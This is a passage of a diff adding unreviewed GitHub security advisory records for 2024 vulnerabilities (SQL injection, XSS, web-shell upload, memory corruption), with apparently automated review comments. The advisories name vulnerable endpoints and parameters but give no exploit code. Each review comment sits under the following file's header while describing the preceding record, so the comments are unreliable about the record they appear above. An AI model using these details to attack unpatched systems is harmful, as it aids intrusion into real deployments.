+++ b/advisories/unreviewed/2024/02/GHSA-3pwh-6jh8-p592/GHSA-3pwh-6jh8-p592.json
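Review bot: `cwe_ids` is empty although `details` describes an unauthenticated SQL injection, so `"cwe_ids": ["CWE-89"]` applies and is consistent with the CRITICAL 9.8 vector. The plugins.trac.wordpress.org reference uses `old=3032596%40booking&new=3032596%40booking`, i.e. the same revision on both sides, so it most likely renders an empty diff; the link should be checked and pointed at the actual fixing changeset before the advisory is reviewed.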
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3pwh-6jh8-p592",
+ "modified": "2024-02-05T12:30:20Z",
+ "published": "2024-02-05T12:30:20Z",
+ "aliases": [
+ "CVE-2023-5643"
+ ],
+ "details": "Out-of-bounds Write vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations. Depending on the configuration of the Mali GPU Kernel Driver, and if the system’s memory is carefully prepared by the user, then this in turn could write to memory outside of buffer bounds.This issue affects Bifrost GPU Kernel Driver: from r41p0 through r45p0; Valhall GPU Kernel Driver: from r41p0 through r45p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r45p0.\n\n",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5643"
+ },
+ {
+ "type": "WEB",
+ "url": "https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-787"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T10:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3qmf-fj65-6vmf/GHSA-3qmf-fj65-6vmf.json b/advisories/unreviewed/2024/02/GHSA-3qmf-fj65-6vmf/GHSA-3qmf-fj65-6vmf.json
new file mode 100644
index 0000000000000..95daa6212ede4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3qmf-fj65-6vmf/GHSA-3qmf-fj65-6vmf.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3qmf-fj65-6vmf",
+ "modified": "2024-02-06T00:30:25Z",
+ "published": "2024-02-06T00:30:25Z",
+ "aliases": [
+ "CVE-2023-4637"
+ ],
+ "details": "The WPvivid plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the restore() and get_restore_progress() function in versions up to, and including, 0.9.94. This makes it possible for unauthenticated attackers to invoke these functions and obtain full file paths if they have access to a back-up ID.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4637"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/trunk/includes/class-wpvivid.php#L3736"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/trunk/includes/class-wpvivid.php#L3943"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3023214/wpvivid-backuprestore/trunk/includes/class-wpvivid.php?contextall=1&old=3007861&old_path=%2Fwpvivid-backuprestore%2Ftrunk%2Fincludes%2Fclass-wpvivid.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bad0bd6b-9c88-4d31-90b5-92d3ceb8c0af?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3qrv-r8v8-pmw7/GHSA-3qrv-r8v8-pmw7.json b/advisories/unreviewed/2024/02/GHSA-3qrv-r8v8-pmw7/GHSA-3qrv-r8v8-pmw7.json
new file mode 100644
index 0000000000000..a4b1e25fe55fa
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3qrv-r8v8-pmw7/GHSA-3qrv-r8v8-pmw7.json
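Review bot: `details` says the functions can be invoked by "unauthenticated attackers", but the CVSS vector records PR:L; either the text or the vector is wrong, or the back-up ID precondition was scored as a privilege, and the discrepancy should be resolved against the referenced Wordfence entry before review. `cwe_ids` is also empty although the text attributes the issue to a missing capability check on restore() and get_restore_progress(), so `"cwe_ids": ["CWE-862"]` applies.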
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3qrv-r8v8-pmw7",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2024-1048"
+ ],
+ "details": "A flaw was found in the grub2-set-bootflag utility of grub2. After the fix of CVE-2019-14865, grub2-set-bootflag will create a temporary file with the new grubenv content and rename it to the original grubenv file. If the program is killed before the rename operation, the temporary file will not be removed and may fill the filesystem when invoked multiple times, resulting in a filesystem out of free inodes or blocks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1048"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2024-1048"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256827"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.openwall.com/lists/oss-security/2024/02/06/3"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/06/3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-459"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T18:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3rpv-j58g-7jfj/GHSA-3rpv-j58g-7jfj.json b/advisories/unreviewed/2024/02/GHSA-3rpv-j58g-7jfj/GHSA-3rpv-j58g-7jfj.json
new file mode 100644
index 0000000000000..58ffa26c78a0e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3rpv-j58g-7jfj/GHSA-3rpv-j58g-7jfj.json
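Review bot: The last two references differ only in scheme (`http://` versus `https://www.openwall.com/lists/oss-security/2024/02/06/3`), so one is redundant and the plain-http entry should be dropped. CWE-459 fits the leftover-temporary-file description, and the LOW rating is consistent with an A:L vector that needs local access and user interaction.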
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3rpv-j58g-7jfj",
+ "modified": "2024-02-02T15:30:28Z",
+ "published": "2024-02-02T15:30:28Z",
+ "aliases": [
+ "CVE-2024-0269"
+ ],
+ "details": "ManageEngine ADAudit Plus versions 7270 and below are vulnerable to the Authenticated SQL injection in File-Summary DrillDown. This issue has been fixed and released in version 7271.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0269"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T13:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3wh9-2fg7-9h5g/GHSA-3wh9-2fg7-9h5g.json b/advisories/unreviewed/2024/02/GHSA-3wh9-2fg7-9h5g/GHSA-3wh9-2fg7-9h5g.json
new file mode 100644
index 0000000000000..c60d221795af8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3wh9-2fg7-9h5g/GHSA-3wh9-2fg7-9h5g.json
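Review bot: `cwe_ids` is empty although `details` describes an authenticated SQL injection, so `"cwe_ids": ["CWE-89"]` applies, and PR:L matches the "Authenticated" wording. This record and the CVE-2023-48793 record earlier in the diff cite the same `sqlfix-7271.html` page but state different affected builds ("7270 and below" here, "through 7250" there); the two should be reconciled against the vendor page. The `details` string also ends with two stray newlines.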
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3wh9-2fg7-9h5g",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-33065"
+ ],
+ "details": "Information disclosure in Audio while accessing AVCS services from ADSP payload.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33065"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3wxq-76w9-ghcp/GHSA-3wxq-76w9-ghcp.json b/advisories/unreviewed/2024/02/GHSA-3wxq-76w9-ghcp/GHSA-3wxq-76w9-ghcp.json
new file mode 100644
index 0000000000000..fc6d987049e5a
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3wxq-76w9-ghcp/GHSA-3wxq-76w9-ghcp.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3wxq-76w9-ghcp",
+ "modified": "2024-02-06T12:30:31Z",
+ "published": "2024-02-06T12:30:31Z",
+ "aliases": [
+ "CVE-2024-24940"
+ ],
+ "details": "In JetBrains IntelliJ IDEA before 2023.3.3 path traversal was possible when unpacking archives",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24940"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jetbrains.com/privacy-security/issues-fixed/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22",
+ "CWE-23"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T10:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3x65-x797-c3v9/GHSA-3x65-x797-c3v9.json b/advisories/unreviewed/2024/02/GHSA-3x65-x797-c3v9/GHSA-3x65-x797-c3v9.json
new file mode 100644
index 0000000000000..e07d1c93dbbc7
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3x65-x797-c3v9/GHSA-3x65-x797-c3v9.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3x65-x797-c3v9",
+ "modified": "2024-02-07T18:30:27Z",
+ "published": "2024-02-07T18:30:27Z",
+ "aliases": [
+ "CVE-2024-22012"
+ ],
+ "details": "In TBD of TBD, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22012"
+ },
+ {
+ "type": "WEB",
+ "url": "https://source.android.com/security/bulletin/pixel/2024-02-01"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T16:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json b/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json
new file mode 100644
index 0000000000000..cc38cf33c2b65
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json
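Review bot: `details` reads "In TBD of TBD", so the affected component and function are placeholders carried over from the Pixel bulletin and the record currently says nothing about where the out-of-bounds write is; that should be resolved from the bulletin, or explicitly flagged, rather than left as TBD. `cwe_ids` is empty although the text describes an out-of-bounds write from a missing bounds check, so `"cwe_ids": ["CWE-787"]` applies. No CVSS vector is recorded, so the null severity is expected.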
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3x87-pjpc-6c9c",
+ "modified": "2024-02-05T09:30:28Z",
+ "published": "2024-02-05T09:30:28Z",
+ "aliases": [
+ "CVE-2024-24864"
+ ],
+ "details": "A race condition was found in the Linux kernel's media/dvb-core in dvbdmx_write() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24864"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8178"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-362"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T08:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-3xhr-vwcx-8p3c/GHSA-3xhr-vwcx-8p3c.json b/advisories/unreviewed/2024/02/GHSA-3xhr-vwcx-8p3c/GHSA-3xhr-vwcx-8p3c.json
new file mode 100644
index 0000000000000..bfecc0512eabd
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-3xhr-vwcx-8p3c/GHSA-3xhr-vwcx-8p3c.json
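Review bot: The only technical reference is an OpenAnolis bugzilla entry; for a race in the Linux kernel's dvb-core a reviewer would want the upstream fix commit (or an explicit note that none exists yet) before the record is marked reviewed, since neither the affected kernel range nor the fix can be derived from this record. CWE-362 and the A:H vector match the null-pointer-dereference consequence described. The `details` string ends with five stray newlines.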
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3xhr-vwcx-8p3c",
+ "modified": "2024-02-06T06:30:32Z",
+ "published": "2024-02-06T06:30:32Z",
+ "aliases": [
+ "CVE-2023-43533"
+ ],
+ "details": "Transient DOS in WLAN Firmware when the length of received beacon is less than length of ieee802.11 beacon frame.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43533"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-125"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-42fh-xcj5-fxwg/GHSA-42fh-xcj5-fxwg.json b/advisories/unreviewed/2024/02/GHSA-42fh-xcj5-fxwg/GHSA-42fh-xcj5-fxwg.json
new file mode 100644
index 0000000000000..c8596e1ffb6ac
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-42fh-xcj5-fxwg/GHSA-42fh-xcj5-fxwg.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-42fh-xcj5-fxwg",
+ "modified": "2024-02-02T15:30:28Z",
+ "published": "2024-02-02T15:30:28Z",
+ "aliases": [
+ "CVE-2023-6675"
+ ],
+ "details": "Unrestricted Upload of File with Dangerous Type vulnerability in National Keep Cyber Security Services CyberMath allows Upload a Web Shell to a Web Server.This issue affects CyberMath: from v.1.4 before v.1.5.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6675"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-24-0080"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T13:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-42gc-pq7v-4hjr/GHSA-42gc-pq7v-4hjr.json b/advisories/unreviewed/2024/02/GHSA-42gc-pq7v-4hjr/GHSA-42gc-pq7v-4hjr.json
new file mode 100644
index 0000000000000..2921f252c84e1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-42gc-pq7v-4hjr/GHSA-42gc-pq7v-4hjr.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-42gc-pq7v-4hjr",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-41280"
+ ],
+ "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41280"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qnap.com/en/security-advisory/qsa-23-38"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-120"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-439f-fqrh-gmv2/GHSA-439f-fqrh-gmv2.json b/advisories/unreviewed/2024/02/GHSA-439f-fqrh-gmv2/GHSA-439f-fqrh-gmv2.json
new file mode 100644
index 0000000000000..4a6da24a636fd
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-439f-fqrh-gmv2/GHSA-439f-fqrh-gmv2.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-439f-fqrh-gmv2",
+ "modified": "2024-02-02T15:30:28Z",
+ "published": "2024-02-02T15:30:28Z",
+ "aliases": [
+ "CVE-2023-6672"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in National Keep Cyber Security Services CyberMath allows Stored XSS.This issue affects CyberMath: from v1.4 before v1.5.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6672"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-24-0080"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T13:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-444j-ccxr-jrr5/GHSA-444j-ccxr-jrr5.json b/advisories/unreviewed/2024/02/GHSA-444j-ccxr-jrr5/GHSA-444j-ccxr-jrr5.json
new file mode 100644
index 0000000000000..755222bdbc711
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-444j-ccxr-jrr5/GHSA-444j-ccxr-jrr5.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-444j-ccxr-jrr5",
+ "modified": "2024-02-06T00:30:26Z",
+ "published": "2024-02-06T00:30:26Z",
+ "aliases": [
+ "CVE-2023-6953"
+ ],
+ "details": "The PDF Generator For Fluent Forms – The Contact Form Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the header, PDF body and footer content parameters in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploitation level depends on who is granted the right to create forms by an administrator. This level can be as low as contributor, but by default is admin.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6953"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3023486%40fluentforms-pdf%2Ftrunk&old=2929799%40fluentforms-pdf%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b6675c48-43d4-4394-a4a3-f753bdaa5c4e?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:15:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-44qh-gw8j-g2gv/GHSA-44qh-gw8j-g2gv.json b/advisories/unreviewed/2024/02/GHSA-44qh-gw8j-g2gv/GHSA-44qh-gw8j-g2gv.json
new file mode 100644
index 0000000000000..3cedcd855fc48
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-44qh-gw8j-g2gv/GHSA-44qh-gw8j-g2gv.json
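Review bot: `cwe_ids` is left empty in this record although `details` identifies the weakness as Stored Cross-Site Scripting, which CWE-79 covers and which sibling records on this page (the CVE-2023-6672 file, for one) already use; the same gap appears in the files for CVE-2023-7014, CVE-2024-0373, CVE-2023-6985, CVE-2024-0761, CVE-2024-0254, CVE-2024-0612 and CVE-2024-0659, and in the Qualcomm CVE-2023-33077 record whose details name memory corruption. An empty list is indistinguishable from "no CWE applies" to consumers that filter or trend by weakness class, so a default-empty value silently degrades that signal. Since `github_reviewed` is false this may be intended to be filled during triage; if the sync is expected to carry the CNA's CWE, the Wordfence-sourced records appear not to supply one here, which is worth confirming against the ingest source. For this file the populated form would be `"cwe_ids": [ "CWE-79" ]`.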
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-44qh-gw8j-g2gv",
+ "modified": "2024-02-02T09:30:22Z",
+ "published": "2024-02-02T09:30:22Z",
+ "aliases": [
+ "CVE-2024-21860"
+ ],
+ "details": "\nin OpenHarmony v4.0.0 and prior versions\n\nallow an adjacent attacker arbitrary code execution in any apps through use after free.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21860"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T07:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-44vw-x4jf-3q2f/GHSA-44vw-x4jf-3q2f.json b/advisories/unreviewed/2024/02/GHSA-44vw-x4jf-3q2f/GHSA-44vw-x4jf-3q2f.json
new file mode 100644
index 0000000000000..a69c630932aa4
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-44vw-x4jf-3q2f/GHSA-44vw-x4jf-3q2f.json
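Review bot: The `details` string opens with a literal `\n` and carries a `\n\n` run mid-sentence, so it renders with a leading blank line and a gap inside the sentence, and the sentence itself has no subject ("in OpenHarmony v4.0.0 and prior versions … allow an adjacent attacker …"), which leaves the record reading as a fragment. The CVE-2024-1039 and CVE-2023-45735 files on this page carry the same leading and trailing newline runs, and the CVE-2023-6675, CVE-2023-6672, CVE-2023-52188, CVE-2023-50327 and CVE-2023-50937 files end in a trailing `\n\n`. This looks like CNA text copied verbatim by the sync, so the fix belongs in ingestion rather than in each file: strip leading and trailing whitespace from `details` before writing it, keeping interior `\n` only where the source breaks lines on purpose (as in the QNAP record's version list). The trimmed value for this record would be `"details": "in OpenHarmony v4.0.0 and prior versions\n\nallow an adjacent attacker arbitrary code execution in any apps through use after free."`, and the missing subject should be checked against the NVD entry rather than guessed.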
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-44vw-x4jf-3q2f",
+ "modified": "2024-02-06T21:30:26Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2024-24160"
+ ],
+ "details": "MRCMS 3.0 contains a Cross-Site Scripting (XSS) vulnerability via /admin/system/saveinfo.do.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24160"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/wy876/cve/issues/1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T16:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-44xm-468v-w3hq/GHSA-44xm-468v-w3hq.json b/advisories/unreviewed/2024/02/GHSA-44xm-468v-w3hq/GHSA-44xm-468v-w3hq.json
new file mode 100644
index 0000000000000..069065b5b7ed3
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-44xm-468v-w3hq/GHSA-44xm-468v-w3hq.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-44xm-468v-w3hq",
+ "modified": "2024-02-06T18:30:21Z",
+ "published": "2024-02-06T18:30:21Z",
+ "aliases": [
+ "CVE-2024-1252"
+ ],
+ "details": "A vulnerability classified as critical was found in Tongda OA 2017 up to 11.9. Affected by this vulnerability is an unknown functionality of the file /general/attendance/manage/ask_duty/delete.php. The manipulation of the argument ASK_DUTY_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252991.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1252"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/b51s77/cve/blob/main/sql.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252991"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252991"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
